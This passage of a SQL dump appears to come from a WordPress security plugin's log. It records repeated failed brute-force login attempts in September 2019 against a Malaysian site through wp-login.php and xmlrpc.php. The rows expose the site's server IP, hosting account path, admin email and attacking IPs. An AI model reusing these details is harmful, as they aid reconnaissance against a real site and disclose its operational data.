11:34:19',18257336,19555736,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.9.122'),(25049,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.62.98.196\";s:11:\"REMOTE_PORT\";s:5:\"53486\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIYFW4SfF9g@8lNlxxLqAAAAFA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568806933.8051\";s:12:\"REQUEST_TIME\";s:10:\"1568806933\";}}','notice','2019-09-18 11:42:15','2019-09-18 11:42:14',17741464,19232800,'https://bintara.com.my/wp-login.php',1,0,'178.62.98.196'),(25050,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.62.98.196\";s:11:\"REMOTE_PORT\";s:5:\"54500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIYGcrWzCkhZpjT3iN-iQAAAUM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568806937.6706\";s:12:\"REQUEST_TIME\";s:10:\"1568806937\";}}','notice','2019-09-18 11:42:19','2019-09-18 11:42:18',18258800,19555584,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.98.196'),(25051,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"36.92.1.31\";s:11:\"REMOTE_PORT\";s:5:\"59104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIa9m4SfF9g@8lNlxxNgQAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568807670.5153\";s:12:\"REQUEST_TIME\";s:10:\"1568807670\";}}','notice','2019-09-18 11:54:31','2019-09-18 11:54:30',18258608,19556408,'https://bintara.com.my/xmlrpc.php',1,0,'36.92.1.31'),(25052,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"155.138.149.86\";s:11:\"REMOTE_PORT\";s:5:\"39668\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIbgMrWzCkhZpjT3iODEgAAAUo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568807808.5477\";s:12:\"REQUEST_TIME\";s:10:\"1568807808\";}}','notice','2019-09-18 11:56:49','2019-09-18 11:56:48',17743408,19233840,'https://bintara.com.my/wp-login.php',1,0,'155.138.149.86'),(25053,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"155.138.149.86\";s:11:\"REMOTE_PORT\";s:5:\"40770\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIbg1lvzIDnRn6zOHUCLgAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568807811.9033\";s:12:\"REQUEST_TIME\";s:10:\"1568807811\";}}','notice','2019-09-18 11:56:53','2019-09-18 11:56:52',18256056,19554256,'https://bintara.com.my/xmlrpc.php',1,0,'155.138.149.86'),(25054,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"52694\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIe@crWzCkhZpjT3iOGEgAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568808697.1462\";s:12:\"REQUEST_TIME\";s:10:\"1568808697\";}}','notice','2019-09-18 12:11:38','2019-09-18 12:11:37',17740048,19230592,'https://bintara.com.my/wp-login.php',1,0,'104.248.27.238'),(25055,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"53786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIe-srWzCkhZpjT3iOGGgAAAUY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568808702.5478\";s:12:\"REQUEST_TIME\";s:10:\"1568808702\";}}','notice','2019-09-18 12:11:43','2019-09-18 12:11:42',18258872,19557592,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.27.238'),(25056,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"41.76.212.181\";s:11:\"REMOTE_PORT\";s:5:\"38142\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIgpsrWzCkhZpjT3iOHvQAAAUw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568809126.6617\";s:12:\"REQUEST_TIME\";s:10:\"1568809126\";}}','notice','2019-09-18 12:18:47','2019-09-18 12:18:47',17739160,19230208,'https://bintara.com.my/wp-login.php',1,0,'41.76.212.181'),(25057,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"41.76.212.181\";s:11:\"REMOTE_PORT\";s:5:\"38900\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIgqjYpjlmVadK6PeGrnQAAAM4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568809130.1485\";s:12:\"REQUEST_TIME\";s:10:\"1568809130\";}}','notice','2019-09-18 12:18:53','2019-09-18 